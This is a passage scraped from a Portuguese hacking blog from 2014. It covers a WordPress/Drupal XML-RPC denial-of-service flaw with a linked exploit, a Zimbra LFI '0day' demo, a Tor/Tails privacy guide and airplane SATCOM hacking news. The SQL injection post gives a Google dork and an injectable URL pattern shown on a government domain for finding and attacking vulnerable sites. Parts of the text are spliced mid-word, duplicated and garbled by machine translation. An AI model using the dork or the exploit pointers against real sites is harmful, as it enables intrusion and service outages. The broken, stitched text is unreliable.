Depois de ter revelado à imprensa milhares de documentos secretos demonstrando a existência do programa de espionagem da NSA, Snowden obteve no dia 1 de agosto de 2013 uma permissão de asilo provisório na Rússia. Desde sua chegada ao país, Snowden tem sido muito discreto e foi visto poucas vezes em público.

http://www.reuters.com/article/2014/08/07/us-russia-snowden-permit-idUSKBN0G70ZR20140807

WordPress e Drupal vulnerabilidade de negação de serviço

WordPress e Drupal vulnerabilidade de negação de serviço

Uma recente falha nos CMS's Wordpress e Drupal, que permitem  negação de serviço XML foi publicada no blog www.breaksec.com.

Também na página oficial do wordpress voltada para suporte, foi recebido o seguinte post:
WordPress › Support » Plugins and Hacks
iThemes Security (formerly Better WP Security)
Warning: XMLRPC WordPress Exploit DDOS (2 posts)
http://wordpress.org/support/topic/warning-xmlrpc-wordpress-exploit-ddos

Opção Padrão WordPress Inseguro = Very Large Botnet de DDOS / Mais de 162.000 afetados até o momento. 
DDOS = ataque de negação de serviço-, destina-se a pedidos completos e sobrecarga para o servidor, até que o tráfego real acaba sendo bloqueado ou as falhas do servidor. 

O XML-RPC é um protocolo de chamada de procedimento remoto (CPR) que utiliza XML para codificar suas chamadas e HTTP como um mecanismo de transporte. É um protocolo simples, definido com poucas linhas de códigos em oposição com a maioria dos sistemas de RPC, onde os documentos padrões são freqüentemente com milhares de páginas e exige apoio de softwares para serem usados.

Qualquer site WordPress com Pingback habilitado (que é ativado por padrão) podem ser usados ​​em ataques DDoS contra outros sites. Note-se que XMLRPC é usado para pingbacks, trackbacks, acesso remoto via dispositivos móveis e muitos outros recursos. Assim, você pode usá-lo para um bom propósito.

A vulnerabilidade afeta WordPress 3.5 a 3.9.1 e Drupal 6.x e 7.x., O ataque pode deixar o servidor fora de serviços em questão de segundos ou minutos.
Foi desenvolvido um exploit que explorar ataques XML com Negação de serviço, Tal ataque é diferente dos demais processos de exploração XML Bomb, no sentido que o mesmo distorce o limite de memória e MySQL, Apache Max Clients works . Para utilizar tal bug não tem necessidade ou auxilio de nem plugin, pois é uma falha padrão já instalada do WordPress e Drupal.  

Riscos da situação atual::::
- Serviço não disponível (muitas conexões abertas, mysql_connect(): Muitas conexões em aberto) 

- WORDPRESS
- Serviço não disponível (muitas conexões abertas, mysql_connect(): Muitas conexões em aberto)

- DRUPAL
- Serviço não disponível (muitas conexões abertas, mysql_connect(): Muitas conexões em aberto)


- 100% CPU, RAM Usage
- 100% CPU, RAM Usage


Sobre Ataque XML Quadratic Blowup: Um XML quadrática ataque blowup é semelhante a um Billion Laughs attack:
O que seria um Billion Laughs attack: Em sec, um ataque Billion Laughs é um tipo de (DoS) ataques denial-of-service, que visa analisadores de documentos XML. [1] 
É também referido como uma XML bomb  ou como um ataque de expansão entidade exponencial [2].

Vídeo demostrativo do ataque:


EXPLOIT: http://pastebin.com/5HpJGiZL

REF:
http://www.breaksec.com/?p=6362
https://en.wikipedia.org/wiki/Billion_laughs
https://httpd.apache.org/docs/current/mod/mpm_common.html
http://php.net/manual/en/ini.core.php
https://en.wikipedia.org/wiki/Document_type_definition
http://wordpress.org/news/2014/08/wordpress-3-9-2/

Pentest na vida real



Pentest na vida real por mais que muitos não percebam o hacking se torna algo frequente seja aquela mentirinha que tu conta quando chega atrasado no serviço que se encaixa em engenharia social ou qualquer coisa que você encontre que te ajudara a fazer algo de forma mais fácil quando o google glass foi anunciado creio que todos do cenário underground ficaram curiosos de como ele era produzido algum tempo apos foi postado um tutorial que usei como base em um fórum criando um óculos inteligente com raspberry pi apos alguns testes e um sucesso parcial pois o visor que é utilizado trata se de uma tecnologia militar mas a alfandega não deixa chega ao seu destino.
Em breves conversas na comunidade do WearableX decidir dentro de algum tempo cria um tutorial de como montar o óculos mas totalmente voltado para pentest alguma das características

Utilizara o kali linux
Leitura biométricas
Essas são as duas principais características o projeto sera de código aberto  assim todos poderam estuda acha bugs etc e deixa lo cada vez melhor.

quarta-feira, 6 de agosto de 2014

SCANNER INURLBR + Zimbra - Privilegie Escalation via LFI (0day)

0xEXPLOIT ZIMBRA

 Demonstração na pratica utilizando o Scanner INURLBR juntamente com Zimbra 0day exploit.  Lembrando que nenhum dado do servidor acessado foi alterado, apenas compartilhando conhecimento.  Não me responsabilizou pelo seu mau uso.

Demonstração na pratica utilizando o Scanner INURLBR juntamente com Zimbra 0day exploit.
Lembrando que nenhum dado do servidor acessado foi alterado, apenas compartilhando conhecimento.
Não me responsabilizou pelo seu mau uso.


http://www.exploit-db.com/exploits/30085/
http://securityattack.com.br/emails-do-governo-igrejas-e-empresas-vulneraveis-em-ano-de-eleicao/

Até a próxima!!!

terça-feira, 5 de agosto de 2014

Bicicletas do Itaú e seus usuários estão desprotegidos contra hackers

0xSegurança, um assunto que deve ser levado a sério 

0xSegurança, um assunto que deve ser levado a sério


Um dos grandes defeitos do ser humano — em especial de nós, brasileiros — é o de postergar assuntos que não domina ou que desconhece. Por uma falta de interesse alinhada a pouca ou nenhuma experiência, grande parte das pessoas coloca de lado tópicos importantes, como por exemplo segurança da informação. Dominar todas as áreas do conhecimento é humanamente impossível, mas em pleno século XXI, em meio à era da tecnologia e da informação, negligenciar esse tipo de assunto é o mesmo que assumir o declínio, às vezes, de todo um projeto.

Em março de 2013, enquanto escrevia a série “Segurança no mundo Apple”, publiquei um artigo com o tema “Desenvolvimento seguro” e, na época, analisei os 50 apps brasileiros que lideravam o ranking das categorias ou por proverem serviços que podem chamar a atenção de hackers. O resultado foi alarmante: dos 50 apps analisados, 42 apresentaram algum tipo de falha de segurança e 35 tinham falhas de segurança críticas que comprometiam o aplicativo ou o servidor remoto.

Entretanto, o pior dado foi o do descaso quanto aos dados — exceto da equipe do Serpro, por estarmos alinhados em treinamentos ministrados por mim que aconteceram internamente para equipes de desenvolvimento. Nenhum outro desenvolvedor me procurou ou tomou algum tipo de precaução, mesmo meses depois de tornadas públicas as falhas.

Entretanto, o pior dado foi o do descaso quanto aos dados — exceto da equipe do Serpro, por estarmos alinhados em treinamentos ministrados por mim que aconteceram internamente para equipes de desenvolvimento. Nenhum outro desenvolvedor me procurou ou tomou algum tipo de precaução, mesmo meses depois de tornadas públicas as falhas.

Decidi colocar novamente o assunto apps e segurança em questão, em virtude da importância e dos riscos tanto para os desenvolvedores quanto para os usuários dos serviços afetados. Desta vez, optei por analisar um app que fosse conhecido por todos e que o resultado final pudesse ser comprovado sem a necessidade de divulgação dos dados sigilosos. O vídeo abaixo mostra a fragilidade do app envolvendo todo o sistema de controle de bicicletas compartilhadas espalhadas por diversas cidades no Brasil.

A empresa responsável foi informada sobre os problemas em 25 de julho e está trabalhando para corrigir os problemas mencionados.


Bicicletas do Itaú e seus usuários estão desprotegidos contra hackers from Appreendedor on Vimeo.


FONTE:
http://macmagazine.com.br/2014/08/05/appreendedor-seguranca-um-assunto-que-deve-ser-levado-a-serio/?utm_source=website&utm_campaign=wordtwit&utm_medium=web

Endpoint falhos & descuidos, A oportunidade perfeita para governos.


 0xGoverno X 0xCriptografia 

Endpoint falhos & descuidos a oportunidade perfeita para governos.

A segurança do endpoint é um problema documentado por analistas, media e organizações que sofreram perdas devido à falta de uma solução de segurança para endpoints.

Apesar da maioria das organizações protegerem adequadamente as ligações à Internet via TCP/IP (com uma firewall, por exemplo), os endpoints são frequentemente ignorados. Existe um número crescente de pontos de dados que necessitam de uma proteção do endpoint para aplicar uma política de segurança proactiva:

O roubo de dados representa mais de 50 biliões de dólares em perdas [em 2004] só nos EUA. - The Economist (6/18/2005).
50% dos incidents de segurança têm origem no interior da organização.” – 2005, Inquérito do FBI / CSI.
70% das falhas de segurança que envolvem perdas superiores a 100.000 dólares são criadas no interior das empresas.” -Vista Research.
37% dos negócios declaram ter sido vítimas da divulgação pública de informação empresarial através de unidades USB nos últimos 12 meses. Mais alarmente, 62% destes casos de roubo de IP resultaram no encerramento de uma ou mais unidades de negócio, um indicador claro de que o roubo de dados por USB é um sério problema de segurança que as empresas enfrentam.” - Yankee Group 2005.
[A segurança do endpoint] é um enorme problema que as empresas enfrentam, dado o volume de informação roubada com dispositivos amovíveis. -Forrester Research 

- NSA 

A NSA é o maior, agência de espionagem e melhor financiada que o mundo já viu.
Eles gastam bilhões e bilhões de dólares a cada ano fazendo tudo que podem para aspirar as comunicações digitais da maioria dos seres humanos neste planeta que têm acesso à Internet e à rede e telefone. E, como os recentes relatórios do the Guardian e Washington Post show, até mesmo as comunicações internas americanas não estão a salvo de sua rede.

Defendendo-se da NSA, ou qualquer outra agência de inteligência do governo, não é simples, e não é algo que pode ser resolvido apenas por baixar um aplicativo. Mas, graças ao trabalho dedicado de criptógrafos civis e da comunidade de software livre e de código aberto, é ainda possível ter privacidade na Internet, eo software para fazer isso está disponível gratuitamente para todos. Isto é especialmente importante para os jornalistas se comunicar com fontes online.

 As ferramentas e conselhos neste post são destinadas a proteger a sua privacidade a partir de métodos de coleta da NSA, o mesmo conselho pode ser usado para aumentar a segurança de seu computador contra qualquer adversário. É importante lembrar que outros governos, incluindo China e Rússia, gastam enormes quantidades de dinheiro em seus próprios equipamentos de vigilância de alta tecnologia e são conhecidos por atingir especificamente jornalistas e fontes. No EUA, a má segurança digital pode custar denunciantes a sua liberdade, mas em outros países pode custar tanto os jornalistas e as fontes suas vidas. Um exemplo recente da Síria ilustra como descuidada segurança digital podem ter resultados trágicos.

Mas mudar algumas práticas básicas de software poderia atribuir-lhe uma grande dose de privacidade, mesmo se ele não mantê-lo seguro contra ataques direcionados por parte dos governos. Este artigo explora os métodos que podem ser usados ​​em ambos os casos.

- Sistemas de criptografia

Descobrimos algo. Nossa única esperança contra a dominação total. A esperança de que com coragem, discernimento e solidariedade que poderíamos usar para resistir. A estranha propriedade do universo físico em que vivemos dentro
O universo acredita em criptografia.
É mais fácil para criptografar informações do que é para o descodificar. 
- Julian Assange, na introdução de Cypherpunks: Liberdade e o futuro da internet

Criptografia é o processo de tomar uma mensagem de texto simples e uma chave gerada aleatoriamente e fazer operações matemáticas com os dois até que tudo o que resta é um mexidos, versão texto cifrado da mensagem. Decodificação está tomando o texto cifrado ea chave direita e fazer operações matemáticas mais até que o texto original é recuperado. Este campo é chamado de criptografia, ou cripto para breve. Um algoritmo de criptografia, o que operações matemáticas que fazer e como fazê-las, é chamada de cifra.

Para criptografar algo que você precisa a chave certa, e você precisa a chave certa para decifrá-lo também. Se o software de criptografia é implementada corretamente, se a matemática é o som, e se as chaves estão seguras, todo o poder de computação combinada na Terra não pode quebrar essa criptografia.

O projeto de sistemas de criptografia e cifras devem ser completamente público. A única maneira de garantir que a própria cifra não tem uma falha crítica é publicar como ele funciona, para ter muitos olhos examinando-o em detalhe, e para deixá-lo enfrentar os ataques do mundo real em meio selvagem para trabalhar os bugs. O funcionamento interno de mais de criptografia que usamos diariamente, como HTTPS, a tecnologia que torna possível digitar números de cartão de crédito com segurança e senhas em formulários do site, é completamente público. Um atacante que sabe todos os detalhes sobre como funciona a criptografia ainda deve deixar de quebrar a criptografia sem possuir a chave. Crypto que é proprietário, e seu código subjacente segredo, não se pode confiar para ser seguro.

O projeto de sistemas de criptografia e cifras devem ser completamente público. A única maneira de garantir que a própria cifra não tem uma falha crítica é publicar como ele funciona, para ter muitos olhos examinando-o em detalhe, e para deixá-lo enfrentar os ataques do mundo real em meio selvagem para trabalhar os bugs. O funcionamento interno de mais de criptografia que usamos diariamente, como HTTPS, a tecnologia que torna possível digitar números de cartão de crédito com segurança e senhas em formulários do site, é completamente público. Um atacante que sabe todos os detalhes sobre como funciona a criptografia ainda deve deixar de quebrar a criptografia sem possuir a chave. Crypto que é proprietário, e seu códiAnonymize sua localização com o Tor

- TOR

Tor é um serviço de software que permite que você utilize a Internet enquanto esconde o seu endereço IP, que é, em geral, uma representação bastante precisa da sua localização. A rede Tor é composta de mais de 3.600 servidores voluntários chamados de NODES. Quando alguém usa a rede Tor para visitar um website sua conexão fica saltou através de três desses nodes (chamadas de um circuito) antes de finalmente sair para a Internet normal. Qualquer pessoa interceptar o tráfego vai pensar que a sua localização é o nó final de seu tráfego sainte. o subjacente segredo, não se pode confiar para ser seguro.

- Tails: The Live Sistema Amnesic Incognito 

Usando "forte sistema de criptografia corretamente implementado" tem uma curva de aprendizagem enorme e exige que os usuários dedicados e dispostos a colocar um trabalho extra para assumir o controle de sua própria privacidade, que é a principal razão pela qual OTR e PGP não estão atualmente em uso generalizado. Mas mesmo quando você usar essas ferramentas, como você pode garantir "a segurança de endpoints" quando você não pode necessariamente confiar em seu sistema operacional ou outro software que você depende de todos os dias?

A solução é usar um sistema operacional completamente diferente composta completamente de "software que você pode confiar" quando você tem uma grande necessidade de privacidade real. Tails ajuda a resolver este problema.

Tails é um sistema  visa preservar a sua privacidade e anonimato. Ele ajuda você a usar a Internet anonimamente em quase qualquer lugar que você vá e em qualquer computador, mas não deixar nenhum rastro usando menos que você pedir explicitamente.

É um sistema operacional completo concebido para ser usado a partir de um DVD ou um dispositivo USB, independentemente do sistema operacional original do computador. Ele é software livre e baseado em Debian GNU / Linux.

Tails vem com vários aplicativos embutidos pré-configurados com a segurança em mente: navegador web, cliente de mensagens instantâneas, cliente de e-mail, suíte de escritório, de imagem e edição de som, etc...

Tails não é para todos. Ainda é difícil de usar em comparação com os sistemas normais de funcionamento, ele é lento, não tem todo o software que você pode querer. Mas Tails tem todas essas propriedades, porque é projetado especificamente para tornar mais difícil para os usuários a atrapalhar a sua segurança endpoint. Se você está em uma posição onde você acha que a NSA, ou qualquer outro potencial invasor, pode querer direcionar você e seus colegas (a relação jornalista / denunciante vem à mente) é uma das melhores ferramentas disponíveis.

Porque Tails não é prático para o uso diário do computador, é uma boa idéia para adquirir o hábito de usar o OTR e PGP em seu sistema operacional normal também. Tails não vai ajudar a amenizar os efeitos da vigilância, por si só, mas o uso da criptografia sim, em uma base diária vontade.

Toda vez que você iniciar Tails você começar a partir do zero. Qualquer coisa que você fez em sua sessão anterior sobre Tails fica apagado eo sistema é revertido para o estado padrão. Isto significa que mesmo se você ficar infectado com malware ao usar Tails, da próxima vez que inicializar em que o malware será ido.

A criptografia funciona. Fortes sistemas de criptografia corretamente implementadas são uma das poucas coisas que você pode confiar. Infelizmente, a segurança endpoint é tão terrivelmente fraco que NSA pode freqüentemente encontrar maneiras de contornar isso. 
- Edward Snowden, as questões de atendimento ao vivo no site do Guardian

http://pt.wave.com/faqs/seguran%C3%A7a-do-endpoint-%C3%A9-um-problema-s%C3%A9rio
https://pressfreedomfoundation.org/encryption-works
https://www.fsf.org/about/what-is-free-software
https://tacticaltech.org/security-box
https://www.torproject.org/docs/documentation#MailingLists
https://gitweb.torproject.org/tor.git?a=tree;hb=HEAD
https://www.eff.org/pages/tor-and-https
http://www.wired.com/threatlevel/2013/06/signed-bda0df3c/
https://en.wikipedia.org/wiki/Key_server_%28cryptographic%29#Privacy_concerns
http://www.washingtonpost.com/world/national-security/code-name-verax-snowden-in-exchanges-with-post-reporter-made-clear-he-knew-risks/2013/06/09/c9a25b54-d14c-11e2-9f1a-1a7cdee20287_story.html
http://www.claws-mail.org/
https://www.torproject.org/press/press.html.en
https://tor2web.org/
https://tails.boum.org/download/index.en.html ~~~~

Wordpress Lead-Octopus-Power plugin SQL INJECTION


                             0x Wordpress Lead-Octopus-Power plugin SQL INJECTION

Seguindo a serie de como não cria uma cms ops digo de como pequenos bugs em grandes cms são extremamente perigosos e a cada dia acabam se tornando mais comum sendo na própria cms ou em Plugins como ocorre no WordPress ou component que ocorre no Joomla.
Bom vamos la mais uma vez um bug no WordPress explorando SQL INJECTION dessa vez em um plugin vamos ao POC da vulnerabilidade para podemos encontra sites com esse bug usaremos a seguinte 

Dork inurl:wp-content/plugins/Lead-Octopus-Power/lib/optin/optin_page.php?id=  

A falha fica localizada em

site.gov.br/wp-content/plugins/Lead-Octopus-Power/lib/optin/optin_page.php?id=[SQL]

Aviões podem ser hackeados através de wireless em voo / Entertainment System - SATCOM

[+]Avião -> IS vuln!
[+] Avião HACKED -> SUCCESS!

Aviões podem ser hackeados através de wireless em voo Entertainment System Quase um ano atrás, no 'Hack In The Box' cúpula de segurança em Amsterdã, um pesquisador de segurança na n.runs e um piloto de linha aérea comercial, Hugo Teso apresentou uma demonstração de que é possível assumir o controle de sistemas de vôo de aeronaves e comunicação utilizando um smartphone Android e um código de ataque especializado.


Quase um ano atrás, no 'Hack In The Box' cúpula de segurança em Amsterdã, um pesquisador de segurança na n.runs e um piloto de linha aérea comercial, Hugo Teso apresentou uma demonstração de que é possível assumir o controle de sistemas de vôo de aeronaves e comunicação utilizando um smartphone Android e um código de ataque especializado.

Muito semelhante ao anterior, um pesquisador de segurança afirma ter inventado um método que pode dar criminosos acesso ao equipamento de comunicações por satélite em jatos de passageiros por meio de sua WiFi e em voo sistemas de entretenimento. Especialista em segurança cibernética Ruben Santamarta, consultor da empresa de segurança cibernética IOActive, vai apresentar sua pesquisa e todos os detalhes técnicos, esta semana em uma grande convenção de hackers em Las Vegas, a conferência Black Hat, mostrando como os sistemas de comunicação via satélite avião comercial também pode ser comprometida por hackers , juntamente com a evidência de vulnerabilidades do sistema de comunicações por satélite que questiona os padrões estes sistemas estão usando.
Black Hat=> https://www.blackhat.com/us-14/

Trabalho de pesquisa intitulado "SATCOM Terminals: Hacking by Air, Sea and Land", explica que os navios, aeronaves e instalações industriais estão todos em risco de serem comprometidos - talvez com resultados catastróficos.

De acordo com o resumo do pesquisador do público palestra feita, ele vai explicar como os dispositivos vendidos por fornecedores líderes SATCOM do mundo contêm falhas de segurança significativos. IOActive também alegou ter determinado que "100 por cento dos dispositivos poderia ser abusada" por um conjunto de vetores de ataque.
Muitos dos fornecedores de sistemas SATCOM podem ter codificado log-in credenciais - mesmas credenciais usadas em múltiplos sistemas - dando hackers potenciais para roubar credenciais de um sistema e usá-los para acessar outros sistemas, como resultado disso, os hackers podem desativar as comunicações e podem interferir com navegação do avião. O pesquisador descobriu as vulnerabilidades de "engenharia reversa" o software altamente especializado conhecido como firmware, usado para operar equipamentos de comunicação feita pela Cobham Plc, Harris Corp, Hughes Network Systems da EchoStar Corp, Iridium Communications Inc e Japan Radio Co Ltd.  

Enquanto isso, ele descobriu a teoria de que um hacker poderia alavancar um avião de bordo do sinal Wi-Fi ou em voo sistema de entretenimento para invadir seus equipamentos aviônicos. Isso poderia permitir-lhes interromper ou modificar as comunicações por satélite do avião, podendo interferir com os sistemas de navegação e segurança da aeronave. No entanto, é muito importante notar que só porque um pesquisador de segurança pode executar o hack, não significa que os hackers estão fazendo isso ou pode facilmente realizar-lo, também. Santamarta também reconheceu que seus hacks que comprovem a teoria foram realizados em teste controlado, e ele não tem certeza de como prática o hack seria no mundo real.

Fonte: http://thehackernews.com/2014/08/airplanes-can-be-hacked-through_4.html?utm_source=feedburner&utm_medium=feed&utm_campaign=Feed%3A+TheHackersNews+%28The+Hackers+News+-+Security+Blog%29